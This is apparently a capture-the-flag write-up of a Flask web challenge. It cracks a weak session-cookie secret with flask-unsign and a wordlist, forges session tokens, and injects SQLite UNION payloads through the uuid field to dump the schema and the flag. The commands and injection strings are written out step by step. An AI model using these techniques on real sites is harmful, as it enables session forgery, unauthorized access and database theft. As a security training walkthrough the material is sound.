MidnightFlag - SuperQualifiedSession

Author : W00dy

Solves : 6

The developper just created his own website, he is persuaded his authentification system is robust. Prove him wrong !

It’s a flask web application and when we come up on the web application, we can find an home page and two endpoint :

I created an account named owne and I log into it

When I saw my username reflected in the web application, I instantenatly thought about SSTI. Spoiler: It was not :'(

I tried many injection type like SQLi, Authentification bypass as an admin in the login page and of course the supposed SSTI but it didn’t works.

I saw a Flask session token when I log on :

1

flask-unsign --decode --cookie '<cookie>'

The Flask session token take 2 values, an username field and an uuid field.

When we speak about Flask session token, we think about the secret used to craft the token but what if I can found it and craft my own token ?

Let’s try to bruteforce :

1

flask-unsign --wordlist /usr/share/wordlists/rockyou.txt --unsign --cookie '<cookie>' --no-literal-eval

Great ! the secret was secret. Now, i’m able to craft my own Flask Token.

I tried few things like changing my username to admin etc but nothing until I put a " in the uuid field. I got a Internal Server Error…

At this moment, I knew it was an SQLI. The query should looked like that :

1

SELECT * FROM users WHERE `uuid` = "<input>";

Payload to confirm the SQLI : " or 1=1 #

Example for SQLite :

1

" or 1=1 and sqlite_version()=sqlite_version()

And we got a 200 response code. We know that the DBMS is SQLite.

Payload :

1

" UNION SELECT 1,2 #

First and second column are reflected in the page !

1

" UNION SELECT tbl_name,2 FROM sqlite_master WHERE type="table" and tbl_name NOT like "sqlite_%" #

1

" UNION SELECT sql,2 FROM sqlite_master WHERE type!="meta" AND sql NOT NULL AND name ="flag_ahahyougotme" #

1

" UNION SELECT FLAG_EHOUILENOMDELACOLONNEAUSSI,2 FROM flag_ahahyougotme #

Finally, we found the flag : MCTF{SQlInj33c710n_inFl4sk_s3s5sssssion}